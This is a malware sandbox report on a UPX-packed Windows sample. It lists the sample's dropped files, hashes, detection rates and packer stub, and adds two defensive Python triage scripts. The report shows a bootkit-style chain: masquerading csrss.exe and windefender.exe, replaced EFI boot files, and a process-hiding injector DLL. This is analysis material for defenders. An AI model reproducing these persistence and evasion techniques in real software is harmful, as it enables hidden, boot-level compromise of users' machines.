                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View: f6oNLRKHUy.exe, jkDmft1Qoe.exe, app.exe, csrss.exe, csrss.exe, gFNUQfsbhl.exe, AHRwK0YGzi.exe, xYVQ2CgP0M.exe, HAZhIgUBm9.exe, hwvUt9M5T0.exe, 7u479GG98a.exe, bjEAtgsQV8.exe, bxW8vusMVJ.exe, 5uy2bFmu5S.exe, ddscRyPcLJ.exe, v1Ni5GOWI6.exe, A9j7TdY8pG.exe, 10hORi8M8E.exe, 5H9JkoJNvF.exe, mLvt2Sebz3.exe (all detected as malicious)
                                                                                                  B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  C:\EFI\Boot\EfiGuardDxe.efi
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):279552
                                                                                                  Entropy (8bit):4.553173975914215
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                                                                  MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                                                                  SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                                                                  SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                                                                  SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  C:\EFI\Boot\bootx64.efi
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):101376
                                                                                                  Entropy (8bit):5.951577458824018
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                                                                  MD5:09031A062610D77D685C9934318B4170
                                                                                                  SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                                                                  SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                                                                  SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 59%
                                                                                                  C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):288256
                                                                                                  Entropy (8bit):6.31266455792162
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                                                                  MD5:D98E33B66343E7C96158444127A117F6
                                                                                                  SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                                                                  SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                                                                  SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
• Antivirus: Metadefender, Detection: 14%
                                                                                                  • Antivirus: ReversingLabs, Detection: 73%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                                                                  C:\Users\user\Desktop\upd.exe
                                                                                                  Process:C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3788288
                                                                                                  Entropy (8bit):7.892618389779633
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:r1HRHgwXrMeyKVNrb6VryiHiJ+9fCU/3PLg:r1HvrZ9Vlfq1pN3
                                                                                                  MD5:3C3046F640F7825C720849AAA809C963
                                                                                                  SHA1:61AE00EC8041DE7826DECEB176C495AB23392EFB
                                                                                                  SHA-256:3993AA1A1CF9BA37316DB59A6EF67B15EF0F49FCD79CF2420989B9E4A19FFC2A
                                                                                                  SHA-512:64FCA2287D36195C66E11C62292D094ECF7374BCAF931D04AEA5A388F7F67D5588BAE14A79107E61D660E745A17D577D06A69C367408AC48C4A789317D2B2470
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 31%
                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........$................9......0R. ....@R.......@.......................... ......................................................................................................................................................................UPX0.....0R.............................UPX1......9..@R...9.................@...UPX2..................9.............@...3.95.UPX!.......-..s.....9..&..&"....... Go build ID: "efKxbRE8zJFH9gxB....7pBf/JfqrRU>jpK8uMrff7Rq/6PoX...onZYEm2XfJCsywwk/P5vIQLaJH_zAA....twCM0QU". ...d...........;a.v ...."....D$...$...`..k..&.........|.....f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..<W........L....A....9.}..w._.9.-8.9....5...p........
                                                                                                  C:\Windows\Logs\CBS\CBS.log
                                                                                                  Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):3080192
                                                                                                  Entropy (8bit):5.314136477236586
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqIH:TL1dq
                                                                                                  MD5:1602CB2334DFE1B40AA9BD15E39BA0C2
                                                                                                  SHA1:E8CDC55E0CEC5925B2FAE4581E9A7059C83B6375
                                                                                                  SHA-256:21C8082B81E5F535410DC8BE90DCA278715A735425BDBD61CB081B710168C657
                                                                                                  SHA-512:F54E1400F194F35CA4CD2541FD9DCB27F9D06EC900E63C7EB0A792249BF6B6127666B277329118067F0E4A5BB2733240643D57A7F60C0C67528A7F4059843CD2
                                                                                                  Malicious:false
                                                                                                  Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                                                                  C:\Windows\rss\csrss.exe
                                                                                                  Process:C:\Users\user\Desktop\upd.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3788288
                                                                                                  Entropy (8bit):7.892618389779633
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:r1HRHgwXrMeyKVNrb6VryiHiJ+9fCU/3PLg:r1HvrZ9Vlfq1pN3
                                                                                                  MD5:3C3046F640F7825C720849AAA809C963
                                                                                                  SHA1:61AE00EC8041DE7826DECEB176C495AB23392EFB
                                                                                                  SHA-256:3993AA1A1CF9BA37316DB59A6EF67B15EF0F49FCD79CF2420989B9E4A19FFC2A
                                                                                                  SHA-512:64FCA2287D36195C66E11C62292D094ECF7374BCAF931D04AEA5A388F7F67D5588BAE14A79107E61D660E745A17D577D06A69C367408AC48C4A789317D2B2470
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 31%
                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........$................9......0R. ....@R.......@.......................... ......................................................................................................................................................................UPX0.....0R.............................UPX1......9..@R...9.................@...UPX2..................9.............@...3.95.UPX!.......-..s.....9..&..&"....... Go build ID: "efKxbRE8zJFH9gxB....7pBf/JfqrRU>jpK8uMrff7Rq/6PoX...onZYEm2XfJCsywwk/P5vIQLaJH_zAA....twCM0QU". ...d...........;a.v ...."....D$...$...`..k..&.........|.....f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..<W........L....A....9.}..w._.9.-8.9....5...p........
                                                                                                  C:\Windows\windefender.exe
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2102272
                                                                                                  Entropy (8bit):7.879347868736008
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                                                                  MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                  SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                                                                  SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                                                                  SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
• Antivirus: Metadefender, Detection: 29%
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                                                                  \Device\Null
                                                                                                  Process:C:\Windows\SysWOW64\sc.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39
                                                                                                  Entropy (8bit):3.964228182058903
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:fxjRCqjv:ZMc
                                                                                                  MD5:2F1A2A9AA9E93E390CC54C36BDB0561B
                                                                                                  SHA1:BC13C3DAE9A3C2A7E45F08F2EF1BB14893078EC7
                                                                                                  SHA-256:706A0C615566BE5CC8D24596CD765A00BE7D5E036CA006DFBD8DE7BC6F7FA719
                                                                                                  SHA-512:4204246AF86876511D1748734BADD3008297EBBFD2E306BC00AED13BD5F5B2A946A0C5A72F3988429A5A4F09B2BFC4E2406D07E87A6F8FDD90309B2C9CCF97FF
                                                                                                  Malicious:false
                                                                                                  Preview: [SC] SetServiceObjectSecurity SUCCESS..
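The dropped-file records above carry the two facts a triage script can act on without running anything: where each PE was written and by whom, and its hash. Read together they show a system-binary name (csrss.exe) outside System32, an executable written straight into C:\Windows, the same MD5 at two paths (upd.exe and the csrss.exe it writes), and a four-stage drop chain starting at the submitted sample. The following Python is an added example, not part of the Joe Sandbox report, that encodes those checks and runs them over the records as printed above (path, writing process, MD5). The SYSTEM_BINARIES list is an illustrative assumption, not a complete inventory of Windows binaries.

```python
import ntpath
from collections import defaultdict

# Assumed, illustrative list of names that belong only under System32/SysWOW64;
# a real deployment would take this from a clean build's file inventory.
SYSTEM_BINARIES = {"csrss.exe", "smss.exe", "lsass.exe", "services.exe",
                   "svchost.exe", "winlogon.exe", "wininit.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Dropped-file records copied from the report: (path, writing process, MD5).
DROPPED = [
    (r"C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe",
     r"C:\Windows\rss\csrss.exe", "D98E33B66343E7C96158444127A117F6"),
    (r"C:\Users\user\Desktop\upd.exe",
     r"C:\Users\user\Desktop\0NlSa5bf55.exe", "3C3046F640F7825C720849AAA809C963"),
    (r"C:\Windows\rss\csrss.exe",
     r"C:\Users\user\Desktop\upd.exe", "3C3046F640F7825C720849AAA809C963"),
    (r"C:\Windows\windefender.exe",
     r"C:\Windows\rss\csrss.exe", "E0A50C60A85BFBB9ECF45BFF0239AAA3"),
]


def path_anomalies(path):
    """Reasons a dropped PE path is suspicious on its own (empty list if none)."""
    p = path.lower()
    name, parent = ntpath.basename(p), ntpath.dirname(p)
    reasons = []
    if name in SYSTEM_BINARIES and parent not in SYSTEM_DIRS:
        reasons.append("system binary name outside System32")
    if parent == r"c:\windows":
        reasons.append("executable written directly under C:\\Windows")
    return reasons


def self_copies(records):
    """Same MD5 at more than one path: a stage copying itself under a new name."""
    by_hash = defaultdict(list)
    for path, _parent, md5 in records:
        by_hash[md5.upper()].append(path)
    return {h: paths for h, paths in by_hash.items() if len(paths) > 1}


def drop_chain(records, root):
    """Depth-first walk from the submitted sample through who-dropped-what."""
    children = defaultdict(list)
    for path, parent, _md5 in records:
        children[parent.lower()].append(path)
    order, stack = [], [root]
    while stack:
        cur = stack.pop()
        order.append(cur)
        stack.extend(reversed(children[cur.lower()]))
    return order


def report(records, root):
    anomalies = {}
    for path, _parent, _md5 in records:
        reasons = path_anomalies(path)
        if reasons:
            anomalies[path] = reasons
    return {"anomalies": anomalies,
            "self_copies": self_copies(records),
            "chain": drop_chain(records, root)}


if __name__ == "__main__":
    for key, value in report(DROPPED, r"C:\Users\user\Desktop\0NlSa5bf55.exe").items():
        print(key, value)
```

The chain walk keys on the lower-cased writing-process path, so the same stage reached via differently cased paths is still one node; the hash grouping upper-cases MD5s for the same reason.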

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                  Entropy (8bit):7.878858503837156
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:0NlSa5bf55.exe
                                                                                                  File size:2095616
                                                                                                  MD5:ee30d6928c9de84049aa055417cc767e
                                                                                                  SHA1:a2aec2076bdfa92e5cda03443bec7b6c3287b43a
                                                                                                  SHA256:0ab024b0da0436fddc99679a74a26fdcd9851eb00e88ff2998f001ccd0c9016f
                                                                                                  SHA512:dfc5ec66d2917378c5d24c29eeccde315723f45bb08005d723d76ad7c0521637f007c8277c0eaa3568de7d527a6a561b56363be84f72a0ee4c4ee957ee401667
                                                                                                  SSDEEP:49152:xxaU1ag6hb9cFsZYOvexqnKc6I0YwahWWSRy8cpripxC3pUojB:DwgSWF+5e6K54JMRcpmpxaD
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>K............... .......-.@.M...-...M...@.......................... M............................................

                                                                                                  File Icon

                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x8d0340
                                                                                                  Entrypoint Section:UPX1
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows cui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:6
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:6
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:6
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:6ed4f5f04d62b18d96b26d6db7c18840
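The fields above (entrypoint inside UPX1, entropy 7.88, zero timestamp, RELOCS_STRIPPED) are the static UPX indicators, and the Entrypoint Preview that follows opens with the standard UPX stub: pushad, mov esi with the packed-data address, lea edi with a negative displacement. For this sample 0x6D1015 - 0x2D0015 = 0x401000, which is ImageBase 0x400000 plus the RVA 0x1000 at which UPX normally places UPX0, so the stub's destination can be checked against the section table. The Python below is an added example, not part of the report, that does that check with only the standard library: it parses a PE32 header, locates the entry section, decodes the first three stub instructions to recover the unpack destination, and computes file and section entropy. It runs on a constructed image built inside the script (sections, offsets and the stub bytes are chosen to reproduce the layout described above), not on the report's sample; header offsets are those of the PE/COFF specification.

```python
import hashlib
import math
import struct

# COFF Characteristics bits (PE/COFF specification).
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_DEBUG_STRIPPED = 0x0200


def shannon_entropy(data):
    """8-bit Shannon entropy, the figure sandbox reports quote per file/section."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(data):
    """Read the header fields a packer-triage pass needs from a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr})
    return {"timestamp": timestamp, "characteristics": characteristics,
            "entry_rva": entry_rva, "image_base": image_base, "sections": sections}


def section_for_rva(sections, rva):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def decode_upx_stub(code):
    """Decode the opening of the UPX1 stub, pushad / mov esi, SRC / lea edi, [esi+DELTA],
    and return (SRC, SRC+DELTA): packed input and unpack destination. None if no match."""
    if len(code) < 12 or code[0] != 0x60 or code[1] != 0xBE or code[6:8] != b"\x8d\xbe":
        return None
    src = struct.unpack_from("<I", code, 2)[0]
    delta = struct.unpack_from("<i", code, 8)[0]   # displacement is signed
    return src, (src + delta) & 0xFFFFFFFF


def triage(data):
    """Packer indicators: entropies, section layout, entry section, stub destination."""
    pe = parse_pe32(data)
    secs = pe["sections"]
    entry_sec = section_for_rva(secs, pe["entry_rva"])
    stub, entry_entropy = None, 0.0
    if entry_sec:
        raw = data[entry_sec["rawptr"]:entry_sec["rawptr"] + entry_sec["rawsize"]]
        entry_entropy = shannon_entropy(raw)
        stub = decode_upx_stub(raw[pe["entry_rva"] - entry_sec["va"]:][:12])
    names = [s["name"] for s in secs]
    return {
        "file_entropy": round(shannon_entropy(data), 3),
        "entry_section_entropy": round(entry_entropy, 3),
        "section_names": names,
        "entry_section": entry_sec["name"] if entry_sec else None,
        "upx_sections": names[:2] == ["UPX0", "UPX1"],
        "timestamp_zero": pe["timestamp"] == 0,
        "relocs_stripped": bool(pe["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED),
        "unpack_dest": stub[1] if stub else None,
        "dest_is_first_section": bool(stub) and stub[1] == pe["image_base"] + secs[0]["va"],
    }


def build_sample():
    """Constructed PE32 image (not the report's sample): UPX0/UPX1/UPX2 sections,
    a UPX-style stub at the entrypoint inside UPX1, zero timestamp, relocs stripped."""
    secs = [(b"UPX0", 0x2D0000, 0x1000, 0, 0),          # (name, vsize, va, rawsize, rawptr)
            (b"UPX1", 0x600000, 0x2D1000, 0x200, 0x400),
            (b"UPX2", 0x1000, 0x8D1000, 0x200, 0x600)]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 224, 0x0303)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2D1100)                   # AddressOfEntryPoint (in UPX1)
    struct.pack_into("<I", opt, 28, 0x400000)                   # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)             # Section/File alignment
    struct.pack_into("<H", opt, 68, 3)                          # Subsystem: console
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", *s, 0, 0, 0, 0, 0x60000020) for s in secs)
    img = bytearray(dos + b"PE\0\0" + coff + bytes(opt) + hdrs)
    img += b"\0" * (0x800 - len(img))
    # Deterministic pseudo-random bytes in UPX1 stand in for compressed data.
    img[0x400:0x600] = b"".join(hashlib.sha256(b"upx1" + bytes([i])).digest() for i in range(16))
    # pushad ; mov esi, 0x6D1015 ; lea edi, [esi-0x2D0015] ; push edi ; or ebp, -1
    img[0x500:0x510] = bytes.fromhex("60 BE 15 10 6D 00 8D BE EB FF D2 FF 57 83 CD FF")
    return bytes(img)


if __name__ == "__main__":
    for k, v in triage(build_sample()).items():
        print(k, hex(v) if isinstance(v, int) and not isinstance(v, bool) else v)
```

The decoder is deliberately narrow: it recognises only the mov/lea pairing of the 32-bit UPX stub, so a different packer or a patched stub returns None rather than a wrong address, and the entropy is reported both for the whole file and for the entry section because the packed section is what carries the high figure.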

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  pushad
                                                                                                  mov esi, 006D1015h
                                                                                                  lea edi, dword ptr [esi-002D0015h]
                                                                                                  push edi
                                                                                                  or ebp, FFFFFFFFh
                                                                                                  jmp 00007F41549ACC82h
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  nop
                                                                                                  mov al, byte ptr [esi]
                                                                                                  inc esi
                                                                                                  mov byte ptr [edi], al
                                                                                                  inc edi
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  jc 00007F41549ACC5Fh
                                                                                                  mov eax, 00000001h
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  adc eax, eax
                                                                                                  add ebx, ebx
                                                                                                  jnc 00007F41549ACC7Dh
                                                                                                  jne 00007F41549ACC9Ah
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  jc 00007F41549ACC91h
                                                                                                  dec eax
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h
                                                                                                  mov ebx, dword ptr [esi]
                                                                                                  sub esi, FFFFFFFCh
                                                                                                  adc ebx, ebx
                                                                                                  adc eax, eax
                                                                                                  jmp 00007F41549ACC46h
                                                                                                  add ebx, ebx
                                                                                                  jne 00007F41549ACC79h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4d1000 | 0x88 | UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
